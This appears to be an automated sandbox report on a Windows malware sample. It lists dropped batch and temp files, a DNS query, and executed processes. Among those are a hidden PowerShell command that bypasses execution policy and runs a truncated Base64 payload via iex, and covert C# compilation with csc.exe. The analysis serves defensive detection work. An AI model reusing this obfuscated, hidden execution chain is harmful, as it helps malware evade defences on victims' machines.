Technical Information
Modifies file system
Creates the following files
- %TEMP%\pleurotusconidiabase.bat
- %HOMEPATH%\dwm.bat
- %TEMP%\ceopb8o9.0.cs
- %TEMP%\ceopb8o9.cmdline
- %TEMP%\ceopb8o9.out
- %TEMP%\csca4b7.tmp
- %TEMP%\resa4c7.tmp
- %TEMP%\ceopb8o9.dll
Deletes the following files
- %TEMP%\resa4c7.tmp
- %TEMP%\csca4b7.tmp
- %TEMP%\ceopb8o9.cmdline
- %TEMP%\ceopb8o9.0.cs
- %TEMP%\ceopb8o9.pdb
- %TEMP%\ceopb8o9.out
- %TEMP%\ceopb8o9.dll
Network activity
UDP
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\PleurotusConidiaBase.bat" "
- '<SYSTEM32>\cmd.exe' /K "%TEMP%\PleurotusConidiaBase.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noprofile -windowstyle hidden -ep bypass -Command ""iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('CiRpZmthaT0kZW52OlVTRVJOQU1FCiR0c3Npcz0iQzpcVXNlcnNcJGlma2FpXGR3bS5iYXQiCml...
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ceopb8o9.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA4C7.tmp" "%TEMP%\CSCA4B7.tmp"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\PleurotusConidiaBase.bat" "' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ceopb8o9.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA4C7.tmp" "%TEMP%\CSCA4B7.tmp"' (with hidden window)
